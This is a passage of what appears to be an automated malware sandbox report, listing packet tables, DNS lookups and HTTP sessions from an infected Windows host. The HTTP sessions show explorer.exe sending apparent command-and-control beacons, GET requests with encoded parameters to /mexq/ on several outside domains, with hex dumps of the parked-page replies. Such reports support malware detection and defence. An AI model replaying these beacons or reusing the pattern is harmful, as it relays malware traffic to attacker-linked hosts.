                                                            Oct 13, 2021 13:39:05.577075958 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.577222109 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.766220093 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854733944 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854760885 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854775906 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854795933 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854813099 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854831934 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854851961 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854870081 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854887009 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854902983 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:05.854929924 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:05.855003119 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.001059055 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001080036 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001091957 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001105070 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001203060 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.001260996 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.001612902 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.001641035 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:06.002245903 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.002320051 CEST4980580192.168.2.6208.91.197.27
                                                            Oct 13, 2021 13:39:06.148061991 CEST8049805208.91.197.27192.168.2.6
                                                            Oct 13, 2021 13:39:16.157680035 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.177623987 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.181229115 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.181458950 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.204415083 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.395705938 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.395731926 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:16.395986080 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.396100998 CEST4982680192.168.2.6217.160.0.226
                                                            Oct 13, 2021 13:39:16.415990114 CEST8049826217.160.0.226192.168.2.6
                                                            Oct 13, 2021 13:39:27.799329042 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.079366922 CEST8049827154.216.110.149192.168.2.6
                                                            Oct 13, 2021 13:39:28.079515934 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.079721928 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.372508049 CEST8049827154.216.110.149192.168.2.6
                                                            Oct 13, 2021 13:39:28.372539043 CEST8049827154.216.110.149192.168.2.6
                                                            Oct 13, 2021 13:39:28.372772932 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.372872114 CEST4982780192.168.2.6154.216.110.149
                                                            Oct 13, 2021 13:39:28.653304100 CEST8049827154.216.110.149192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 13, 2021 13:39:00.196365118 CEST5005553192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:00.275882006 CEST53500558.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:05.286163092 CEST6137453192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:05.422707081 CEST53613748.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:11.041781902 CEST5033953192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:11.082210064 CEST53503398.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:16.125418901 CEST6330753192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:16.155879974 CEST53633078.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:21.413523912 CEST4969453192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:21.450542927 CEST53496948.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:26.461357117 CEST5498253192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:27.473282099 CEST5498253192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:27.798012018 CEST53549828.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:27.811642885 CEST53549828.8.8.8192.168.2.6
                                                            Oct 13, 2021 13:39:33.414989948 CEST5001053192.168.2.68.8.8.8
                                                            Oct 13, 2021 13:39:33.463068962 CEST53500108.8.8.8192.168.2.6

                                                            ICMP Packets

                                                            TimestampSource IPDest IPChecksumCodeType
                                                            Oct 13, 2021 13:39:27.811718941 CEST192.168.2.68.8.8.8d005(Port unreachable)Destination Unreachable

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                            Oct 13, 2021 13:39:00.196365118 CEST192.168.2.68.8.8.80x6a87Standard query (0)www.iphone13promax.designA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:05.286163092 CEST192.168.2.68.8.8.80x69e9Standard query (0)www.vintagepaseo.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:11.041781902 CEST192.168.2.68.8.8.80x9cd5Standard query (0)www.brandmty.netA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:16.125418901 CEST192.168.2.68.8.8.80xda7Standard query (0)www.xn--aprendes-espaol-brb.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:21.413523912 CEST192.168.2.68.8.8.80x1561Standard query (0)www.districonio.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:26.461357117 CEST192.168.2.68.8.8.80x9ea6Standard query (0)www.cyebang.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:27.473282099 CEST192.168.2.68.8.8.80x9ea6Standard query (0)www.cyebang.comA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:33.414989948 CEST192.168.2.68.8.8.80x18ceStandard query (0)www.umdasch-lagertechnik.comA (IP address)IN (0x0001)

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                            Oct 13, 2021 13:38:13.648951054 CEST8.8.8.8192.168.2.60x17aeNo error (0)windowsupdate.s.llnwi.net178.79.242.0A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:00.275882006 CEST8.8.8.8192.168.2.60x6a87Server failure (2)www.iphone13promax.designnonenoneA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:05.422707081 CEST8.8.8.8192.168.2.60x69e9No error (0)www.vintagepaseo.com208.91.197.27A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:11.082210064 CEST8.8.8.8192.168.2.60x9cd5Name error (3)www.brandmty.netnonenoneA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:16.155879974 CEST8.8.8.8192.168.2.60xda7No error (0)www.xn--aprendes-espaol-brb.com217.160.0.226A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:21.450542927 CEST8.8.8.8192.168.2.60x1561Name error (3)www.districonio.comnonenoneA (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:27.798012018 CEST8.8.8.8192.168.2.60x9ea6No error (0)www.cyebang.com154.216.110.149A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:27.811642885 CEST8.8.8.8192.168.2.60x9ea6No error (0)www.cyebang.com154.216.110.149A (IP address)IN (0x0001)
                                                            Oct 13, 2021 13:39:33.463068962 CEST8.8.8.8192.168.2.60x18ceName error (3)www.umdasch-lagertechnik.comnonenoneA (IP address)IN (0x0001)

                                                            HTTP Request Dependency Graph

                                                            • www.vintagepaseo.com
                                                            • www.xn--aprendes-espaol-brb.com
                                                            • www.cyebang.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            0192.168.2.649805208.91.197.2780C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 13, 2021 13:39:05.577222109 CEST6005OUTGET /mexq/?e66HNDO=NdiAijP1TUDTbxv+UVf96WWBcfe2HF0RhGf6TXdRPwqQZT7SHaZsoP4NORlVjEEjxsHi13Lz5g==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.vintagepaseo.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:05.854733944 CEST6006INHTTP/1.1 200 OK
                                                            Date: Wed, 13 Oct 2021 11:39:05 GMT
                                                            Server: Apache
                                                            Set-Cookie: vsid=917vr3816707456615690; expires=Mon, 12-Oct-2026 11:39:05 GMT; Max-Age=157680000; path=/; domain=www.vintagepaseo.com; HttpOnly
                                                            X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BvmoE1YFCm+tBN52SitLTqdTVO+b/MNnOMS6bzT4FdAriOe/RlkeAXaeSbohmAblVkfZ8kWSX7V6WunDyRriUQ==
                                                            Keep-Alive: timeout=5, max=125
                                                            Connection: Keep-Alive
                                                            Transfer-Encoding: chunked
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 34 66 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4b 58 37 34 69 78 70 7a 56 79 58 62 4a 70 72 63 4c 66 62 48 34 70 73 50 34 2b 4c 32 65 6e 74 71 72 69 30 6c 7a 68 36 70 6b 41 61 58 4c 50 49 63 63 6c 76 36 44 51 42 65 4a 4a 6a 47 46 57 72 42 49 46 36 51 4d 79 46 77 58 54 35 43 43 52 79 6a 53 32 70 65 6e 45 43 41 77 45 41 41 51 3d 3d 5f 42 76 6d 6f 45 31 59 46 43 6d 2b 74 42 4e 35 32 53 69 74 4c 54 71 64 54 56 4f 2b 62 2f 4d 4e 6e 4f 4d 53 36 62 7a 54 34 46 64 41 72 69 4f 65 2f 52 6c 6b 65 41 58 61 65 53 62 6f 68 6d 41 62 6c 56 6b 66 5a 38 6b 57 53 58 37 56 36 57 75 6e 44 79 52 72 69 55 51 3d 3d 22 3e 0d 0a 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3b 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 70 78 2e 6a 73 3f 63 68 3d 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 66 75 6e 63 74 69 6f 6e 20 68 61 6e 64 6c 65 41 42 50 44 65 74 65 63 74 28 29 7b 74 72 79 7b 69 66 28 21 61 62 70 29 20 72 65 74 75 72 6e 3b 76 61 72 20 69 6d 67 6c 6f 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6d 67 22 29 3b 69 6d 67 6c 6f 67 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 30 70 78 22 3b 69 6d 67 6c 6f
                                                            Data Ascii: 4f91<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_BvmoE1YFCm+tBN52SitLTqdTVO+b/MNnOMS6bzT4FdAriOe/RlkeAXaeSbohmAblVkfZ8kWSX7V6WunDyRriUQ=="><head><script type="text/javascript">var abp;</script><script type="text/javascript" src="http://www.vintagepaseo.com/px.js?ch=1"></script><script type="text/javascript" src="http://www.vintagepaseo.com/px.js?ch=2"></script><script type="text/javascript">function handleABPDetect(){try{if(!abp) return;var imglog = document.createElement("img");imglog.style.height="0px";imglo
                                                            Oct 13, 2021 13:39:05.854760885 CEST6007INData Raw: 67 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 30 70 78 22 3b 69 6d 67 6c 6f 67 2e 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 73 6b 2d 6c 6f 67 61 62 70 73 74 61 74 75 73 2e 70 68 70 3f 61 3d
                                                            Data Ascii: g.style.width="0px";imglog.src="http://www.vintagepaseo.com/sk-logabpstatus.php?a=QmIvZDVoc29MTkswZ3hUV0xyKzRlVjRFaXpxUVQxZ0pPZXFmU3l5bmFKSENjc2F1S1BRMyswU2VQQWpZaDhueS9VUnhNV2hlaEpWdTFDNDlxdEozR2ptRHZMMS9QZEg0L0JQaXU4SnpVaEFyOU9pdDRFRnFBTExaW
                                                            Oct 13, 2021 13:39:05.854775906 CEST6009INData Raw: 74 70 3a 2f 2f 69 34 2e 63 64 6e 2d 69 6d 61 67 65 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 66 6f 6e 74 73 2f 6f 70 65 6e 2d 73 61 6e 73 2f 6f 70 65 6e 2d 73 61 6e 73 2e 6f 74 66 22 29 20 66 6f 72 6d 61 74 28 22 6f 70 65 6e 74 79 70 65 22 29
                                                            Data Ascii: tp://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.otf") format("opentype"),url("http://i4.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans") format("svg");font-weight: normal;font-style: normal;font-display: swap;}@font
                                                            Oct 13, 2021 13:39:05.854795933 CEST6010INData Raw: 66 69 78 7b 7a 6f 6f 6d 3a 31 7d 0d 0a 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 0a 20 20 6f 70 65 6e 2d 73 61 6e 73 20 0a 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 20 62 61 63 6b 67 72 6f 75
                                                            Data Ascii: fix{zoom:1}body{font-family: open-sans ,sans-serif;font-size:12px; background:#fff;font-weight: 400;background: url(http://i4.cdn-image.com/__media__/pics/27587/BG_2.png) no-repeat center bottom; background-size: cover;background-attach
                                                            Oct 13, 2021 13:39:05.854813099 CEST6011INData Raw: 69 7a 65 3a 20 31 32 70 78 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 0d 0a 2e 63 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 38 30 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 7d 0d 0a
                                                            Data Ascii: ize: 12px; text-decoration: underline}.container{width:800px;margin:0 auto;}.searchbox{float:right; width:400px; height:37px;}.srch-txt{float: left; width: 343px; height: 37px; padding:0 10px;font-size: 16px; background: #fff; color: #
                                                            Oct 13, 2021 13:39:05.854831934 CEST6013INData Raw: 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 20 77 6f 72 64 2d 77 72 61 70 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 20 70 61 64 64 69 6e 67 3a 20 31 35 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 32 70 78 7d 0d 0a 2e 6b 77 64 5f 62 6c 6f 61
                                                            Data Ascii: isplay:block; word-wrap: break-word; padding: 15px;border-radius: 12px}.kwd_bloack ul li a:hover{background-color:#0b8040;color: #fff}.sale-msg {background:#fff; color:#4b4b4b; text-align:center; font-size:14px; height:40px; width:100%;
                                                            Oct 13, 2021 13:39:05.854851961 CEST6014INData Raw: 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 20 74 6f 70 3a 20 75 6e 73 65 74 3b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 6e 6f
                                                            Data Ascii: rgin-bottom: 10px;text-align: center;position: relative; top: unset; transform: none;} .msgright{width: 100%;text-align: center} .top-strip{margin-bottom: 40px} .logo-img-wrap{float:none;width:auto} .searchbox{margin:0; f
                                                            Oct 13, 2021 13:39:05.854870081 CEST6015INData Raw: 61 63 79 20 6c 69 7b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20 75 6c 2e 70 72 69 76 61 63 79 20 6c 69 20 61 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 7d 0d 0a 20 20 20 20
                                                            Data Ascii: acy li{display: block;font-size: 12px} ul.privacy li a{font-size: 12px} .msgright .expMsg, .backorder, .msgright .expMsg a{font-size: 12px} .related-searches-custom{font-size: 14px} }</style><script language="JavaScript"
                                                            Oct 13, 2021 13:39:05.854887009 CEST6017INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 76 69 6e 74 61 67 65 70 61 73 65 6f 2e 63 6f 6d 2f 5f 5f 6d 65 64 69 61 5f 5f 2f 64 65 73 69 67 6e 2f 75 6e 64 65 72 63 6f 6e 73 74 72 75 63 74 69 6f 6e 6e 6f 74 69 63 65 2e 70 68 70 3f 64 3d 76 69 6e 74 61 67
                                                            Data Ascii: "http://www.vintagepaseo.com/__media__/design/underconstructionnotice.php?d=vintagepaseo.com" onClick="return popup(this, 'notes')"> Why am I seeing this 'Under Construction' page?</a></p> <div class="expMsg">
                                                            Oct 13, 2021 13:39:05.854902983 CEST6018INData Raw: 76 65 72 3d 22 63 68 61 6e 67 65 53 74 61 74 75 73 28 27 4d 69 67 72 61 69 6e 65 20 50 61 69 6e 20 52 65 6c 69 65 66 27 29 3b 72 65 74 75 72 6e 20 74 72 75 65 3b 22 20 6f 6e 6d 6f 75 73 65 6f 75 74 3d 22 63 68 61 6e 67 65 53 74 61 74 75 73 28 27
                                                            Data Ascii: ver="changeStatus('Migraine Pain Relief');return true;" onmouseout="changeStatus('');return true;" onclick="if(typeof(showPop) != 'undefined')showPop=0;return modifyKeywordClickURL(this, 'kwclk');;" title="Migraine Pain Relief" id="dk1" name="
                                                            Oct 13, 2021 13:39:06.001059055 CEST6020INData Raw: 37 48 30 47 7a 4c 41 33 50 74 57 4c 72 4d 25 32 42 64 67 65 56 7a 79 78 4c 55 52 6b 57 38 7a 66 4a 49 70 4b 69 25 32 42 5a 72 39 30 39 55 53 32 46 4a 54 50 56 39 55 51 44 61 25 32 46 39 5a 59 78 6c 32 34 6a 57 43 4f 4f 55 49 25 32 46 56 43 74 30
                                                            Data Ascii: 7H0GzLA3PtWLrM%2BdgeVzyxLURkW8zfJIpKi%2BZr909US2FJTPV9UQDa%2F9ZYxl24jWCOOUI%2FVCt08AtxLf3jeKDClULqVLVsnfntpsBZh4B8%2FGlDa7YsDwIzgK4Bp%2ByxFLyhbqyCx5Lya0y09XaBKCORwW8QSWsTqXsI73FPg6BcjnWJsBlVxeg4MsDuMMnrcWibjZmLqS%2Br4BYEd47gvdW3cFz3inq%2BE9dKD


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1192.168.2.649826217.160.0.22680C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 13, 2021 13:39:16.181458950 CEST6077OUTGET /mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.xn--aprendes-espaol-brb.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:16.395705938 CEST6078INHTTP/1.1 301 Moved Permanently
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 13 Oct 2021 11:39:16 GMT
                                                            Server: Apache
                                                            X-Powered-By: PHP/7.4.24
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            X-Redirect-By: WordPress
                                                            Location: http://xn--aprendes-espaol-brb.com/mexq/?e66HNDO=aPMuX7G1Ot9XJXghMAabXwwkzBWzprGcmmQ5cfrgMP5E/C43hf1Uz5bqYekFv+cUss1JtU0p5g==&6lux=TrTPmvux5
                                                            Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            2192.168.2.649827154.216.110.14980C:\Windows\explorer.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Oct 13, 2021 13:39:28.079721928 CEST6079OUTGET /mexq/?e66HNDO=g6L0/Z2eA1jwRGo1l6rXBhzWGtzMcF3Ol1vrZIbNMV/6CHuR9YyStXwolwULrpYmw34wy4pkGQ==&6lux=TrTPmvux5 HTTP/1.1
                                                            Host: www.cyebang.com
                                                            Connection: close
                                                            Data Raw: 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Oct 13, 2021 13:39:28.372508049 CEST6081INHTTP/1.1 200 OK
                                                            Content-Type: text/html; charset=UTF-8
                                                            Server: Microsoft-IIS/8.5
                                                            X-Powered-By: PHP/5.6.40
                                                            X-Powered-By: ASP.NET
                                                            Date: Wed, 13 Oct 2021 11:39:24 GMT
                                                            Connection: close
                                                            Content-Length: 1245
                                                            Data Raw: 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e e4 b9 9d e6 b8 b8 e4 bc 9a e5 a4 87 e7 94 a8 e7 bd 91 e5 9d 80 5f e9 a6 96 e9 a1 b5 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e4 bc 9a e5 a4 87 e7 94 a8 e7 bd 91 e5 9d 80 5f e9 a6 96 e9 a1 b5 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 e4 b9 9d e6 b8 b8 e4 bc 9a e5 a4 87 e7 94 a8 e7 bd 91 e5 9d 80 5f e9 a6 96 e9 a1 b5 22 3e 0d 0a 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 35 31 38 36 36 39 66 30 64 33 31 65 34 31 35 30 38 62 65 30 62 61 62 66 35 61 38 66 63 32 38 22 3b 0d 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0d 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 6d 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a
